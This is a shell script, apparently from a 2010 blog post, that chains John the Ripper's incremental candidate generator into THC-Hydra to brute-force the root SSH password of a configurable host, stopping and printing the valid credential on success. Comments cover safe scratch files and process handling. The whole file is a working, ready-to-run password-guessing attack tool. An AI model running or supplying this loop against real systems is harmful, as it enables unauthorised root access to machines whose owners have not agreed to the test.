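# Configuration for a loop that feeds John the Ripper candidate passwords to
# THC-Hydra in order to test the "root" SSH password of $hydra_host.

# Tool locations.
hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

# hydra settings.
hydra_module="ssh2"     # service module name handed to hydra
hydra_host="127.0.0.1"  # host under test (default: the local machine)
hydra_port="22"
hydra_nb_task="10"      # number of parallel hydra tasks (-t)
# -f: stop after the first valid pair, -s: port, -t: parallel tasks,
# -e ns: also try the empty password and the login name as password.
# Kept as a single string: it is word-split on purpose where hydra is invoked.
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

# john settings.
john_sessionfile="$1"   # session name given on the command line
# Incremental mode (Alpha charset), candidates written to stdout.
john_all_params="--incremental:Alpha --stdout"
john_time_step=20 # time (seconds) to run john

# Scratch files. Both hold sensitive data (password candidates and, on a hit,
# the valid credential in clear text), so they live in a freshly created
# directory that only the current user can read instead of under fixed,
# guessable names in /tmp, where another local user could read them or
# pre-create them as symlinks.
umask 077
work_dir=$(mktemp -d /tmp/hydra-john.XXXXXX) || { echo "cannot create scratch directory" >&2; exit 1; }
# Remove the scratch directory on exit so no credential material is left behind.
trap 'rm -rf -- "$work_dir"' EXIT
tmp_passwd="$work_dir/passwords.tmp"
hydra_logfile="$work_dir/hydra.log"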
# The john session name is a mandatory first argument: without it, print the
# usage line and stop.
# NOTE(review): the exit status is 0 even though the invocation was invalid,
# so a caller checking $? cannot tell misuse from success.
[ -n "$1" ] || {
  echo "Usage: $0 <john session file>"
  exit 0
}
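# Main loop: let john produce a batch of candidate passwords, hand the batch
# to hydra, and repeat until hydra logs a valid login.
while true; do
  # Generate some passwords with John the Ripper.
  echo; echo "- Start (re)generating passwords with John"
  if [ -e "$john_sessionfile.rec" ]; then
    # A session file already exists: restore it.
    "$john" --restore="$john_sessionfile" > "$tmp_passwd" &
  else
    # No session yet: create it.
    # shellcheck disable=SC2086 # john_all_params is an option list, split on purpose
    "$john" $john_all_params --session="$john_sessionfile" > "$tmp_passwd" &
  fi
  john_pid=$!

  # Let john run for $john_time_step seconds, then stop it.
  echo "- Wait ..."
  sleep "$john_time_step"
  echo "- Kill john"
  # Signal only the john started above: `killall john` would also terminate
  # every unrelated john process the user is allowed to signal.
  # Assumes $john is the john binary itself rather than a wrapper script.
  kill "$john_pid" 2>/dev/null
  # Wait for john to exit so its output file is complete before hydra reads it.
  wait "$john_pid" 2>/dev/null

  # Start hydra on the batch that was just generated.
  echo; echo "- Start hydra"; echo
  rm -f -- "$hydra_logfile"
  echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
  # shellcheck disable=SC2086 # hydra_all_params is an option list, split on purpose
  "$hydra" -l root -P "$tmp_passwd" $hydra_all_params "$hydra_host" "$hydra_module" | tee -a "$hydra_logfile"

  # A log line that names the module and is not a DATA status line is treated
  # as a valid pair: print it and stop the loop.
  # That line holds the password in clear text, so keep the log file private.
  if grep -F -- "$hydra_module" "$hydra_logfile" | grep -qv DATA; then
    echo; echo "FOUND !!"
    grep -F -- "$hydra_module" "$hydra_logfile" | grep -v DATA
    exit 0
  fi
done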
Source: http://funoverip.net/2010/12/thc-hydra-password-bruteforcing-with-john-the-ripper/